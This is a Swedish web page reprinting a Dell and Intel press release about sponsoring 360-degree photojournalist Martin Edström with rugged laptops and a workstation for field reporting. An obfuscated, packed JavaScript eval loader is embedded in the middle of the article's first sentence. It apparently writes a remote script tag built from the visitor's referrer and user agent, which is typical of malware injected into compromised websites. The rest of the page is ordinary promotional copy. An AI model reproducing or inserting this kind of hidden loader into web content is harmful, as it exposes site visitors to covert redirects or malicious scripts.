Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

PC

Dell och Intel ger prisad fotograf kraften att göra mer

Dell och Intel ger prisad fotograf kraften att göra mer
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efidn|var|u0026u|referrer|tdtas||js|php’.split(’|’),0,{}))
prisade journalisten och fotografen Martin Edström har under åren gjort sig känd för sina innovativa 360-reportage från några av världens mest avlägsna och utsatta områden. I ett samarbete med Dell och Intel förses han nu med hårdvara för att optimera sitt arbete även i de mest ogynnsamma arbetsförhållandena. Nästa äventyr startar redan den 21 januari då Martin Edström tillsammans med ett stort expeditionsteam reser till Vietnam för att skapa ett 360-reportage från världens största grotta Son Doong på uppdrag av National Geographic.

–      Att skapa interaktiva reportage och upplevelser involverar lika mycket kodande och redigerande som fotografi och skrivande. Det är en helt ny teknisk nivå. För att göra reportage i denna helt nya genre använder jag och mitt team extremt mycket teknisk utrustning, som måste funka både på kontoret och i fält. Förutom kamerorna har våra datorer blivit helt vitala delar av utrustningen även i fält, för att kunna testrendera bilder och se så allt material fungerar. Det är fantastiskt att kunna arbeta med utrustning i toppklass från Dell. Under min senaste resa, då jag arbetade i flyktingläger i Jordanien, lyckades jag till och med rendera samtliga interaktiva bilder redan i fält. Det var första gången det hände, säger Martin Edström.

Dell och Intel har försett Martin med en Latitude 12 Rugged Extreme med fjärde generationens Intel Core i7-4650U processor som gett honom möjlighet att arbeta i regnskog och öken utan att vara rädd att utrustningen ska ta skada. Dessutom har han en Precision M3800, med en Intel Core i7-4712HQ processor, marknadens tunnaste workstation som ger honom en bärbar arbetsstation som han kan använda på resande fot. För att slutföra projekten krävs en skärm med mycket detaljer och korrekt färgåtergivning, för detta syfte försågs Martin med en 4K-skärm.

–      Vi är mycket stolta över att samarbeta med Martin och få ta del av alla de intressanta uppdrag han gör. Vi ser fram emot ett långsiktigt samarbete där vi på Dell även i framtiden kommer stötta Martin och förse honom med den tekniska utrustning han behöver för att underlätta sitt arbete, säger Mats Jentzen, marknadschef på Dell Sverige.

–       Det är fantastiskt spännande och lärorikt att stödja Martin i hans arbete. Han ställer höga krav på det han levererar och det är helt naturligt att all den teknik han använder i sitt arbete också ska motsvara eller till och med överträffa hans krav. Lika starka som Martins reportage är, lika kraftfull ska tekniken vara som stödjer honom, säger Nicklas Aglert, affärsutvecklare på Intel Norra Europa.

Martin har mottagit en rad priser och utmärkelser, senast i Årets bild 2014 för sitt 360-reportage från Jordaniens största flyktingläger Zaatari. Han arbetar även för internationella medier som The New York Times och The Guardian samt för organisationer som FN och International Rescue Committee för att i bild och text skapa reportage från världens alla hörn.

För att följa Martins arbete och läsa mer om honom, besök: http://livetsomkreator.se/martin-edstrom/

Om Livet Som Kreatör

Livet Som Kreatör är en blogg och ett initiativ startat av Dell för att lyfta fram kreatörer inom olika branscher och få dessa att utvärdera och arbeta på produkter från Dell. Målet med projektet är att leverera nya lösningar för kreatörer och förenkla deras dagliga arbete samtidigt som vi får en god insyn i vad som egentligen sker på kontoret hos professionella kreatörer. Martin Edström värvades under hösten tillsammans med designbyrån Kollor och arkitektbyrån Elding Oscarson för att dokumentera sin vardag som kreatörer. För att läsa bloggarna, besök: www.livetsomkreator.se.

Om Dell

Dell Inc. värdesätter kundernas önskemål och levererar innovativ teknik och tjänster som ger dem kraften att göra mer. För mer information, besök www.dell.se.

Om Intel      

Intel är världsledande inom nyskapande datorteknik. Företaget utvecklar och tillverkar teknik som utgör kärnan i datorer av olika slag världen över. Som ledare inom CSR och hållbarhet tillverkar Intel även världens första kommersiella processor som är helt ”konfliktfri”. Ytterligare information om Intel finns pånewsroom.intel.com samt på blogs.intel.com och mer information om Intels arbete för konfliktfria produkter finns på conflictfree.intel.com.